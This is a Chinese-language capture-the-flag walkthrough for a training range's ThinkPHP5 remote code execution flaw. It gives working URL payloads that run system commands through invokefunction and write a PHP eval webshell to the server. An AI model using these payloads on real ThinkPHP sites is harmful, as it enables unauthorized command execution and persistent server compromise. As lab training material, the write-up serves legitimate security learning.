网盾安全学院综合靶场-ThinkPHP5 远程代码执行漏洞通关功略

漏洞概述

我们知道在ThinkPHP5中是有远程代码执行漏洞的。这个漏洞由于框架对控制器名未能进行足够的检测,攻击者利用该漏洞对目标网站进行远程命令执行攻击。

write up

靶场地址:http://ctf.wangdun.cn

靶场信息:

影响范围

ThinkPHP 5.0.全版本

这个漏洞在测试当中发现该漏洞并不通杀,还是得看复现的版本,目前所测试的情况如下:

 当前映射80端口为47052,我们访问该地址

 我们可以构造payload来测试下命令执行漏洞:

http://ctf.wangdun.cn:47052/
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=pwd

命令成功执行,当然此时我们可以直接去查看tmp目录下的flag了

http://ctf.wangdun.cn:47052/
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls /tmp

 当然这里的操作思路还有其他,比方说可以直接写入webshell,比方说这里直接插入一句话

http://ctf.wangdun.cn:47052/
/?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=%3C?php%20@eval($_POST[pass])?%3E

大家可以去测试下,我是mac电脑,所以没法用菜刀去尝试了,大家可以去尝试下

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值